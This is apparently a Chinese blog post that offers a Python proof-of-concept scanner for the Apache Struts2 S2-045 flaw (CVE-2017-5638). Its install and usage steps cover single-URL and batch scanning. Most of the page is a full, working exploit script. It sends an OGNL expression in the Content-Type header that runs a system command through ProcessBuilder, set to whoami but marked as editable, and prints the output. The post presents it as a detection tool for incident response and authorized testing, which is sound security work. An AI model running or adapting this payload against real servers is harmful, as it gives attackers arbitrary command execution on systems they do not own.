Struts2 S2-045 远程代码执行漏洞检测工具(CVE-2017-5638)

Struts2 S2-045 远程代码执行漏洞检测工具(CVE-2017-5638)

本项目是一个针对 Apache Struts2 高危漏洞 S2-045 (CVE-2017-5638) 的 Python 检测脚本(PoC)。该漏洞源于 Struts2 的 Jakarta 插件在处理上传文件时,对异常的处理不当,导致攻击者可通过构造恶意 Content-Type 头,在受影响的服务器上执行任意系统命令。本工具旨在帮助安全人员快速、批量地检测目标系统是否存在此漏洞。

功能特性

  • 精准漏洞检测 :针对 CVE-2017-5638 漏洞,通过发送精心构造的包含 OGNL 表达式的 Content-Type 数据包,验证命令执行结果。
  • 双模式扫描
    • 单目标检测 :使用 -u 参数对单个 URL 进行深度检测。
    • 批量文件扫描 :使用 -f 参数加载包含多个 URL 的文本文件,实现大规模自动化检测。
  • 清晰的执行逻辑 :脚本包含命令执行验证环节,通过执行 whoami 等简单命令并回显结果,确认漏洞存在的真实性,减少误报。
  • 环境适应性提示:考虑到网络延迟,代码中包含了超时时间的调整建议,方便用户根据实际网络环境优化检测效果。

安装指南

系统要求

  • Python 2.x 或 Python 3.x
  • 网络连接(用于发送HTTP请求)

安装步骤

  1. 下载脚本 :将 poc.py 脚本保存到本地目录。

  2. 安装依赖 : 本脚本主要依赖 Python 标准库,无需额外安装第三方包。如果运行环境提示缺少模块,请确保已安装 requests 库:

    bash 复制代码
    pip install requests
    # 或使用 pip3
    pip3 install requests

使用说明

基础使用示例

1. 单个目标检测

检测单个 URL 是否存在 S2-045 漏洞。脚本将尝试执行 whoami 命令并返回结果。

bash 复制代码
python poc.py -u http://example.com
2. 批量文件检测

准备一个 url.txt 文件,每行包含一个待检测的 URL。脚本将遍历列表进行检测,并输出存在漏洞的目标。

bash 复制代码
python poc.py -f url.txt

url.txt 文件内容示例:

bash 复制代码
http://target1.com
http://target2.com:8080
https://target3.com/app

典型使用场景

  • 安全应急响应:企业内部或爆发安全事件时,快速排查大量 Struts2 应用服务器是否受影响。
  • 渗透测试:在授权测试中,用于初步的信息收集和漏洞探测。
  • 环境自检:开发或运维人员在修复漏洞后,使用该工具验证补丁是否生效。

核心代码解析

以下是脚本的核心检测逻辑,展示了如何构造恶意数据包并验证漏洞。

python 复制代码
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import sys

def poc(url):
    """
    S2-045 漏洞检测核心函数
    :param url: 目标URL
    :return: 存在漏洞返回命令执行结果,否则返回None
    """
    # 恶意Payload,通过Content-Type头注入OGNL表达式
    # 该表达式会执行 'whoami' 命令并返回结果
    payload = "%{(#test='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='whoami')."  # 此处为要执行的系统命令
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': payload  # 将恶意Payload放入Content-Type头
    }

    try:
        # 发送POST请求,超时时间可根据网络情况调整
        # 注意:网络环境不同可能会遇到超时情况,自行调整timeout时间即可
        response = requests.post(url, headers=headers, timeout=10)
        # 如果响应内容不为空,且不是Struts2的错误页面特征,则大概率存在漏洞并返回命令结果
        if response.text and "org.apache.struts2" not in response.text:
            print(f"[+] 漏洞存在: {url}")
            print(f"[+] 命令执行结果: {response.text.strip()}")
            return response.text
        else:
            print(f"[-] 漏洞不存在: {url}")
    except requests.exceptions.Timeout:
        print(f"[!] 请求超时: {url}")
    except Exception as e:
        print(f"[!] 请求出错: {url}, 错误: {e}")

if __name__ == "__main__":
    if len(sys.argv) == 3 and sys.argv[1] == "-u":
        # 单目标模式
        poc(sys.argv[2])
    elif len(sys.argv) == 3 and sys.argv[1] == "-f":
        # 批量模式
        with open(sys.argv[2], 'r') as f:
            for line in f.readlines():
                target = line.strip()
                if target:
                    poc(target)
    else:
        print("""
使用方法:
    批量检测: python poc.py -f url.txt
    单个检测: python poc.py -u https://your-ip
        """)

6HFtX5dABrKlqXeO5PUv/3TeOIgRNMwyo3o9PgifjmVpNHoux6xe8ap5gebhiZOz

相关推荐
Anastasiozzzz2 小时前
深入研究RAG: 在线阶段-查询&问答
数据库·人工智能·ai·embedding
tq10862 小时前
资本主义的时间贴现危机:AI时代的结构性淘汰机制
人工智能
砍材农夫2 小时前
spring-ai 第四多模态API
java·人工智能·spring
土豆12505 小时前
LangGraph TypeScript 版入门与实践
人工智能·llm
土豆12505 小时前
OpenSpec:让 AI 编码助手从"乱猜"到"照单执行"
人工智能·llm
Thomas.Sir5 小时前
第二章:LlamaIndex 的基本概念
人工智能·python·ai·llama·llamaindex
m0_694845575 小时前
Dify部署教程:从AI原型到生产系统的一站式方案
服务器·人工智能·python·数据分析·开源
LS_learner5 小时前
VS Code 终端默认配置从 PowerShell 改为 CMD
人工智能
小毅&Nora6 小时前
【人工智能】【大模型】大模型“全家桶”到“精兵简政”:企业AI落地的理性进化之路
人工智能·大模型·平安科技
KaneLogger7 小时前
如何把AI方面的先发优势转化为结构优势
人工智能·程序员·架构